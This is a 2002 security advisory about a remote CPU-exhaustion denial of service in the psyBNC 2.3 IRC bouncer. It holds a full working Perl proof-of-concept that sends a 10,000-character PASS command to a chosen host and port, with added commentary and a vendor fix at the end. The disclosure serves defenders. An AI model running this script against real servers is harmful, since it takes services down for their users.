26th Sep 2002 [SBWID-5306]
COMMAND
	PsyBNC Remote DoS
SYSTEMS AFFECTED
	Version 2.3
PROBLEM
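	dvdman [http://www.l33tsecurity.com/] posted the following proof of concept
	for a remote DoS that consumes 100% CPU. The script opens a TCP connection
	to the bouncer and immediately sends USER, NICK and a PASS command with a
	10,000-character argument.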
	psyBNC is an easy-to-use, multi-user, permanent  IRC-Bouncer  with  many
	features. [http://www.psychoid.lam3rz.de/]
	 Proof Of Concept
	 ================
	
	#!/usr/bin/perl
	#PsyBNC 2.3 Remote DDOS POC
	#By DVDMAN ([email protected])
	#WWW.L33TSECURITY.COM
	#L33T SECURITY
	use Getopt::Std;
	use IO::Socket;
	# Option handling and dispatch for the proof of concept.
	# Flow, as written: parse -H/-h/-p, optionally print the usage text, then
	# call do_psy() once per option that is set. Execution afterwards falls
	# through to the exit(1) that sits between the two sub definitions.
	# Turn on autoflush for the currently selected output handle (STDOUT).
	$|=1;
	my %options;
	# Getopt::Std::getopt() treats every listed letter (H, h and p) as a
	# switch that takes a value and stores that value in %options.
	getopt('Hhp',\%options);
	# $arg2 is a package global (no `my`); nothing else in the visible script
	# reads it.
	$arg2 = shift(@ARGV);
	# Prints the usage text when -h carries a true value. usage() does not
	# exit, so the checks below still run.
	$options{h} && usage();
	# First call: made whenever -H is set, whether or not -p is set as well.
	if ($options{H})
	{
	do_psy();
	}
	# Independent second check (not an elsif). do_psy() ends in die() once it
	# has sent its data, so this second call is only reached when the first
	# call returned early on a failed connect, or when -H was not given.
	if ($options{p})
	{
	do_psy();
	}
	else
	{
	usage();
	}
	# Writes the banner and the option summary to STDOUT and returns to the
	# caller; it does not terminate the script itself.
	sub usage()
	{
	    # One entry per output line; $0 expands to the name the script was
	    # started under.
	    my @banner = (
	        "[L33TSECURITY]  PsyBNC 2.3 Remote DDOS\n",
	        " (C) DVDMAN \n\n",
	        "Usage: $0 [options]\n",
	        "-H = hostname or ip REQUIRED\n",
	        "-p = port of PSYBNC server REQUIRED\n",
	    );
	    print(@banner);
	}
	# Top-level statement placed between the two sub definitions: it runs after
	# the option dispatch above finishes, i.e. after usage() was printed or
	# after do_psy() returned from a failed connect. The exit status is 1 in
	# every case that reaches this line.
	exit(1);
	# Proof-of-concept routine for the psyBNC 2.3 CPU-exhaustion report.
	# Reads the target host and port from the file-level %options hash (-H and
	# -p), opens one TCP connection, writes three IRC registration lines (USER,
	# NICK, PASS) and then ends the script with die(). Nothing is read back
	# from the socket, so the script itself never checks how the server reacts.
	# Returns early (no value) when the connection cannot be opened.
	# NOTE(review): the page does not state the root cause; presumably the
	# oversized PASS argument is what produces the 100% CPU condition, and the
	# size limit on that command is what the fix has to enforce - confirm
	# against the vendor change.
	sub do_psy() {
	my $test = $options{H};
	my $test2 = $options{p};
	    # $remote is a package global (no `my`). new() yields a false value
	    # when the connection cannot be established.
	    $remote = IO::Socket::INET->new(
	                        Proto     => "tcp",
	                                PeerAddr  => $test,
	                                PeerPort  => $test2,
	        );
	    unless ($remote) {
	           # Reported on STDOUT without a trailing newline; control goes
	           # back to the caller, which continues with its own flow.
	           print"error cannot connect";
	           return
	        }
	    $remote->autoflush(1);
	print STDERR "PsyBNC REMOTE DDOS BY DVDMAN\n";
	print STDERR " starting attack in 5 seconds...\n";
	sleep(5);
	my $user = "USER OWNED OWNED OWNED OWNED OWNED\r\n";
	my $nick = "NICK OWNED\r\n";
	# "PASS " followed by 10,000 "A" characters. Unlike USER and NICK this
	# string carries no trailing "\r\n", so the server receives one very long,
	# unterminated PASS argument as the first PASS on a fresh connection.
	# NOTE(review): for detection, a PASS argument of this size sent during
	# registration is far larger than a normal client login line; logging or
	# rejecting oversized lines on the bouncer port should surface it - verify
	# against real traffic.
	my $pw = "PASS " . "A"x10000;
	print $remote $user;
	print $remote $nick;
	print $remote $pw;
	print STDERR "DONE\n"; 
	# die() ends the whole script here, so no code after a successful call to
	# do_psy() is ever executed.
	die "BYE\n";
	}
	#By DVDMAN ([email protected])
	#WWW.L33TSECURITY.COM
	#L33T SECURITY
	
SOLUTION
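	Fixed in the currently available 2.3 release and in the current beta
	version (2.3.1). Because the affected and the fixed release are both
	labelled 2.3, the version number alone does not show whether a given
	installation includes the fix; an installation built before this advisory
	should be rebuilt from the current release.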